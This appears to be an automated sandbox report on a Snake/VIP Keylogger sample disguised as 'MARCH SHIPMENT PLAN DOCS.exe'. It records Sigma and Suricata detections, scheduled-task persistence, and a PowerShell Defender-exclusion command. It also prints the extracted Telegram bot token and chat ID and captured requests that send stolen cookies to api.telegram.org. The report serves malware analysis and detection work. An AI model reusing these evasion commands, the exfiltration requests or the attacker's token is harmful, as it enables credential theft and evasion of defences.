Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", ProcessId: 5428, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ProcessId: 7164, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", ProcessId: 5428, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T08:35:08.857057+0100	2803305	3	Unknown Traffic	192.168.2.7	49708	104.21.32.1	443	TCP
2025-03-05T08:35:16.502684+0100	2803305	3	Unknown Traffic	192.168.2.7	49762	104.21.32.1	443	TCP
2025-03-05T08:35:18.891970+0100	2803305	3	Unknown Traffic	192.168.2.7	49779	104.21.32.1	443	TCP
2025-03-05T08:35:23.972834+0100	2803305	3	Unknown Traffic	192.168.2.7	49825	104.21.32.1	443	TCP
2025-03-05T08:35:24.262416+0100	2803305	3	Unknown Traffic	192.168.2.7	49829	104.21.32.1	443	TCP
2025-03-05T08:35:27.280837+0100	2803305	3	Unknown Traffic	192.168.2.7	49856	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T08:35:06.994093+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	193.122.130.0	80	TCP
2025-03-05T08:35:08.291038+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	193.122.130.0	80	TCP
2025-03-05T08:35:13.275381+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49709	193.122.130.0	80	TCP
2025-03-05T08:35:13.994161+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49705	193.122.130.0	80	TCP
2025-03-05T08:35:15.931667+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49705	193.122.130.0	80	TCP
2025-03-05T08:35:18.900524+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49768	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T08:35:34.256465+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49900	149.154.167.220	443	TCP
2025-03-05T08:35:35.488123+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49911	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T08:35:28.187583+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49858	149.154.167.220	443	TCP
2025-03-05T08:35:29.541347+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49869	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
Source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
Source: PKjWaa.exe.7948.20.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Virustotal: Detection: 52%			Perma Link

Multi AV Scanner detection for submitted file

Source: MARCH SHIPMENT PLAN DOCS.exe	Virustotal: Detection: 52%			Perma Link
Source: MARCH SHIPMENT PLAN DOCS.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	String decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	String decryptor: 6744331132
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49747 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49869 version: TLS 1.2

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: HnGT.pdbSHA256l source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr
Source:	Binary string: HnGT.pdb source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 02F2F45Dh	10_2_02F2F2C0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 02F2F45Dh	10_2_02F2F4AC
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 02F2F45Dh	10_2_02F2F52F
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 02F2FC19h	10_2_02F2F961
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F23308h	10_2_06F22EF0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F22D41h	10_2_06F22A90
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F23308h	10_2_06F22EEA
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2D919h	10_2_06F2D670
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2EA79h	10_2_06F2E7D0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2E1C9h	10_2_06F2DF20
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2F781h	10_2_06F2F4D8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2EED1h	10_2_06F2EC28
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2D069h	10_2_06F2CDC0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2DD71h	10_2_06F2DAC8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F23308h	10_2_06F23236
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2D4C1h	10_2_06F2D218
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2E621h	10_2_06F2E378
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F20D0Dh	10_2_06F20B30
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F216F8h	10_2_06F20B30
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2F329h	10_2_06F2F080
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_06F20040
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 4x nop then jmp 06F2FBD9h	10_2_06F2F930
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 0705DD45h	12_2_0705E149
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 0122F45Dh	20_2_0122F2C0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 0122F45Dh	20_2_0122F4AC
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 0122FC19h	20_2_0122F970
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069B3308h	20_2_069B2EF0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069B2D41h	20_2_069B2A90
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_069B0673
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BD919h	20_2_069BD670
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BEA79h	20_2_069BE7D0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BE1C9h	20_2_069BDF20
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BF781h	20_2_069BF4D8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BEED1h	20_2_069BEC28
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BD069h	20_2_069BCDC0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BDD71h	20_2_069BDAC8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BD4C1h	20_2_069BD218
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069B3308h	20_2_069B3236
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069B0D0Dh	20_2_069B0B30
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069B16F8h	20_2_069B0B30
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BE621h	20_2_069BE378
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BF329h	20_2_069BF080
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_069B0853
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_069B0040
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 4x nop then jmp 069BFBD9h	20_2_069BF930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49858 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49911 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49869 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49900 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.7:51391 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2005/03/2025%20/%2016:09:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2006/03/2025%20/%2003:53:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5c610e80a695Host: api.telegram.orgContent-Length: 1282
Source: global traffic	HTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5cd0d6d8d833Host: api.telegram.orgContent-Length: 1282

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49768 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49779 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49829 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49825 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49762 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49856 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49747 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2005/03/2025%20/%2016:09:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2006/03/2025%20/%2003:53:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
